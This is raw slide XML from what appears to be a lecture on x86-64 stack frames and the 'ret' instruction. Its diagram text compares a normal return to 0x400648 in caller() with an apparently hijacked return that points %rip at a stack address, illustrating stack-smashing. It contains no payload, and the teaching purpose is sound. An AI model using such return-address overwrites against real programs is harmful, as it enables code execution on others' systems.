                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A263CE3F-1EA0-1844-B235-F6001372FFD8}"/>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0" name="Rectangle 239">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFA3CCE7-E84A-C848-ADF4-F7722F4EAD3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1" name="Rectangle 240">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{692D2172-C8ED-C74B-9E1C-5EA71CE8AF00}"/>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2" name="Rectangle 241">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{609BA8DD-FD8C-3042-9D65-F0738027E16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3" name="Rectangle 242">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B5C6EE9-5E78-BE46-968F-396A167F4326}"/>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4" name="Rectangle 243">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BDFB624-CDCE-344C-984D-8935E63F7784}"/>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245" name="Rectangle 244">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{280C456A-269C-3D47-845C-DB4D1B239FBD}"/>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211" name="Group 210">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DC07570-346F-ED4B-94B5-2D8CDEBC8DBD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="686819" y="4335234"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="230" name="Rectangle 229">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{687869B9-101F-A448-A335-027E6AB84887}"/>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1" name="Rectangle 230">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C92B3347-0556-D443-A56D-74133B09A309}"/>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2" name="Rectangle 231">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13CBED9E-EA7D-DB43-982D-4558CB84FAB5}"/>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3" name="Rectangle 232">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78B3F075-A3EF-6845-89FF-B8A55CDF83C3}"/>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4" name="Rectangle 233">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00D757B7-6149-9B45-AE4C-EAF7829FCAB6}"/>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5" name="Rectangle 234">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7543E14-94B5-8F40-9834-1CE42A00C9BF}"/>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6" name="Rectangle 235">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C4C874C-743F-CB47-8E28-428F9774A90F}"/>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sp>
            <p:nvSpPr>
              <p:cNvPr id="237" name="Rectangle 236">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3608A20-74F9-E140-844E-8BC0B5DB3A8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a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>NUL</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="212" name="Group 211">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{810CBD4F-2C99-014A-97D1-53DF77A0E964}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="686819" y="3539123"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="222" name="Rectangle 221">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93BF4E0B-6683-2F4D-A88A-E00FF67B932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3" name="Rectangle 222">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4639319-D8B0-CD42-8F27-693490047088}"/>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4" name="Rectangle 223">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D0923C6-D420-B04F-A037-CB017FB1F291}"/>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5" name="Rectangle 224">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{162FFB27-D1CF-B74C-BE27-FA42039C42F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6" name="Rectangle 225">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E74E873-B492-4B4C-A018-2DB2AE80FBB1}"/>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00</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="227" name="Rectangle 226">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7AB8991-E73A-9441-A4D1-E2F85CDB7DB0}"/>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40</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="228" name="Rectangle 227">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE6775FD-8E58-4542-97E7-6A250816CDB9}"/>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06</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="229" name="Rectangle 228">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56BF14F9-F642-8940-B828-ADB1F43D6DF6}"/>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Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>48</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="213" name="Group 212">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70D0B272-56ED-504A-A73C-1ECCD056107A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="686819" y="2753696"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="214" name="Rectangle 213">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44DE406D-474A-1F41-97ED-A3997034A44E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="920884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5" name="Rectangle 214">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{238AEB1D-9216-7A40-93CB-A0D987C3C5E4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="945061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6" name="Rectangle 215">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34DCB235-4545-2E40-B4A4-8C9F59256D53}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9692388"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7" name="Rectangle 216">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00F843FE-6EF0-9649-99BC-EDB935F874E4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9934159" y="3986006"/>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8" name="Rectangle 217">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F74D2673-F2A7-0D47-B16C-E5CC6A4C03FC}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="10179379" y="3986005"/>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19" name="Rectangle 218">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB1CB8DE-16CA-C34F-B57C-A82B7E055491}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1042149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0" name="Rectangle 219">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D621351-4DF7-5242-A485-98A0E12C4E27}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="10666711"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21" name="Rectangle 220">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30639764-F61D-774D-ABFD-EA3C845FA952}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="10903803" y="3986002"/>
                <a:ext cx="245220" cy="2452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grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DAD1580-9BA7-F84C-8983-9E5D419D87D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1900402" y="5577826"/>
            <a:ext cx="3630037" cy="338554"/>
            <a:chOff x="8546768" y="3218160"/>
            <a:chExt cx="3630037" cy="338554"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2" name="TextBox 1">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61E8EFF3-E50E-DF4A-9573-C58A0F474244}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8546768" y="3218160"/>
              <a:ext cx="576943" cy="33855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ret</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="128" name="TextBox 127">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4508FA77-B610-3C42-B6B7-E83654B1EA55}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9197721" y="3218160"/>
              <a:ext cx="2979084" cy="33855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600">
                  <a:solidFill>
                    <a:srgbClr val="00FA00"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B060904050402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     </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1"/>
                <a:t>pushq</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t> 0x400648</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="254" name="Group 253">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CDF40A5-69E9-5B47-924B-4F052583D7E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5554919" y="3760081"/>
            <a:ext cx="2667619" cy="369332"/>
            <a:chOff x="8434922" y="6044017"/>
            <a:chExt cx="2667619" cy="369332"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="255" name="TextBox 254">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51C7057F-EF6C-CB41-85DE-39BBBCC81357}"/>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0x7FFFFFFFE008</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="256" name="Straight Arrow Connector 255">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFC9AD31-EBB1-D748-A981-CB609C004DC7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:stCxn id="255"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57" name="TextBox 256">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D68FCF3-97B1-0E42-9E66-BF320BDBAAB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6899615" y="4341683"/>
            <a:ext cx="2444900" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="682625" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>%rip =	0x7FFFFFFFDFFD</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="258" name="Straight Arrow Connector 257">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF47A534-F32D-2D4A-BA2E-364F369BC37F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="257" idx="1"/>
            <a:endCxn id="2" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2477345" y="4664849"/>
            <a:ext cx="4422270" cy="10822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A9104903-AB53-1C4E-88C1-47973708AE9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6899615" y="4339472"/>
            <a:ext cx="3802644" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="682625" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>%rip =	0x400648 – in caller()</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov    $0x400730,%edi</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="262" name="Group 261">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C1B9401-4A52-C141-9A2B-B4E539665C56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5553649" y="2975667"/>
            <a:ext cx="2667619" cy="369332"/>
            <a:chOff x="8434922" y="6044017"/>
            <a:chExt cx="2667619" cy="369332"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="263" name="TextBox 262">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F954414A-41C5-5A46-AEB9-8327D4927D99}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8706500" y="6044017"/>
              <a:ext cx="2396041" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>%</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1"/>
                <a:t>rsp</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t> = 0x7FFFFFFFE010</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="264" name="Straight Arrow Connector 263">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B6F3D93-B26A-CB45-8DE1-9F6D80DFFFE9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:stCxn id="263" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="8434922" y="6228683"/>
              <a:ext cx="271578"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36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500"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="6" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="138"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="randombar(vertical)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="138"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="8" presetID="9" presetClass="entr" presetSubtype="0"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4" presetClass="entr" presetSubtype="5"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vertical)">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7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18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5"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randombar(vertic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87"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="187"/>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188"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="188"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="38" presetID="9" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="195"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="195"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="41" presetID="9" presetClass="exit" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="dissolv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grpId="1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="188"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="48" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="188"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="49" presetID="9" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="50" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="198"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="51" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="19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grpId="1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
